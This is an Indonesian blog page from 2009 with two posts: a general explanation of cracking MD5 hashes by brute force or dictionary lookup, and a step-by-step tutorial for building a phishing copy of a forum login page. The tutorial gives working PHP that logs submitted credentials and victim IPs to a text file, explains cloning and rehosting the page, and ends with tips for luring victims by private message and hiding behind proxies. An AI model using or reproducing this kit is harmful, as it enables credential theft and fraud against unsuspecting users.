Jumat, 20 Februari 2009

Bagaimana Cara Cracking md5 ciphered text ?? by malcoder

LOGIKA :
md5 ( message digest 5 ) ituh adalah enkripsi one way hash yang artinya adalah plain text (text asli) yang sudah ter enkripsi tidak mungkin dikembalikan kedalam bentuk semula.

md5 ituh sebanyak apapun plaintextnya pasti akan dibikin menjadi 32 karakter terenkripsi , makanya sering md5 dibikin buat checksum atau pengecekan keabsahan suatu file karena satu karakter saja pun berubah , maka hasil md5nya juga akan berubah , walaupun sudah ditemukan kolisinya beberapa tahun yang lalu.

contoh :
plaintext : malcoder
ciphertext : 8c6d8aed6dc647db4e98ded91049e998

plaintext : apapunlah
ciphertext : 15cdd0fd997178efc32991ea5a5008ea

plaintext : a
ciphertext : 0cc175b9c0f1b6a831c399e269772661

itu membuktikan pernyataan diatas mengenai teori one way hash . Lalu bagaimana ?? kok bisa dicrack ?? khan gak bisa di decrypt....

caranya :
harus mengetahui dulu cara2 cracking password salah satunya bruteforce dan dictionary...
nah lalu kenapa bisa dicrack ??
yah dia bakal ngelakuin hal yang sama yaitu mencoba setiap kombinasi untuk yang bruteforce , dan ngelihat kamus pada metode dictionary...

TAPI.... bedanya sebelum melakukan pencocokan ama yang pengen dicrack , mesin mengenkripsi dulu kombinasi atau word dalam wordlistnya dictionary menjadi md5 .. baru setelah itu di cocokkan... selama belum diketemukan kecocokan , maka cracking berlanjut , dan jika udah diketemukan kecocokan , maka dia akan melihat..
"YANG MD5 INI PUNYA PLAINTEXT YANG MANA SIH??" nah akhirnya diketemukan plaintextnya...

binun ??? hehehe... yaudah saya jelaskan...

misalnya :

md5 yang pengen kita crack : 4a8a08f09d37b73795649038408b5f33

trus si mesin misalnya pake cara bruteforce , trus dia bikin kombinasi semua kemungkinan yang ada dan di encrypt ke md5:

plaintext | Ciphertext
a 0cc175b9c0f1b6a831c399e269772661 {== gak cocok
b 92eb5ffee6ae2fec3ad71c777531578f {== gak cocok
c 4a8a08f09d37b73795649038408b5f33 {== COCOK

setelah diketemukan mana yang cocok , maka akan dicari nih yang cocok yang punya siapa ??
dan diketahui yang punya adalah plaintext "c" berarti md5 yang pengen kita crack tadi text aslinya adalah "c"

CRACKED ... tugas selesaiii..

mudah2an bisa dimengerti...


sumber : http://www.jasakom.com/index.php?categoryid=28&p2_articleid=683

Jumat, 13 Februari 2009

Membuat forum Phiser

pertama2 anda harus membuat 3 file yaitu
index.html
next.php
ppp.txt

nah pada file next.php masukkan code ini
Code:
$datum = date('d-m-Y / H:i:s');
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: http://target.com");
$handle = fopen("ppp.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n");
fwrite($handle, "\r\n");
fclose($handle);

setcookie ("user", "empty", time()+3600);
exit;
?>


atau untuk lebih memudahkan anda saya sudah sedian disini...
Code:
http://www.mediafire.com/?diddyvyxkwo


setelah persiapan diatas selesai sekarang anda menuju target forum yang anda ingin buat phisernya..<img src=" title="Very Happy" />
pada forum target cari halaman loginnya...
setelah anda di forum login click kanan terus view source code ( bila anda menggunakan firefox tekan ctrl+u)

copy paste seluruh source codenya ke file index.html yang anda telah sediakan...
edit index.html anda trus cari method="post" dan gantikan dengan method="get"
cari juga action="alamat link" gantikan dengan action="next.php"

dengan itu password log akan disafe di file ppp.txt

sekarang upload 3 file tersebut ke freehosting ( wets klo soal ini jgn tanya gue yach... ntar gue dikira promosi lagi T_T)

setelah upload terlebih kita check dulu.... nah mungkin anda akan melihat beberapa error
nah kita umpakan target kita terlihat seperti http://dickdownload.com/ copy url

terus pada index.html kita search href=
nah kita ganti . dengan alamat forum dia...
contohnya:

kita menemukan ./styles/hestia_blue/theme/mac.css
nah setelah kita ubah jadinya http://dickdownload.com/styles/hestia_b ... me/mac.css

nah lakukan begitu pada semua href link...
nah untuk menyamakan style ( gambarnya) kita search src dan lakukan serperti cara diatas...

selesai semua kita chmood 777 3 file itu dan menuju ke proses utama.... apa itu ...???
tentu saja menipu seseorang dengan phising kita wkakkwakwakwakaw....


nah dalam tutorial ini saya akan memberikan sedikit tips and trick...( tentu saja sudah saya lakukan :P)

1. Diharapkan menggunakan phising forum pada pm ( private message)
2. Jangan membuat phising link anda terlihat pendek ( usahakan panjang )
3. Berhubung target kita forum gunakan bbcode nya contohnya
[url=phising link anda]contoh link yang ditujuh[/url]
4. Nah usahakan pm ke seseorang tentang suatu topic... ( tergantung creatifitas anda)
5. Jangan pernah melakukan phising dengan pm all member
6. Tidak lupa saat anda registrasi free hosting gunakan proxy yach ( menjaga kemungkinan terburuk).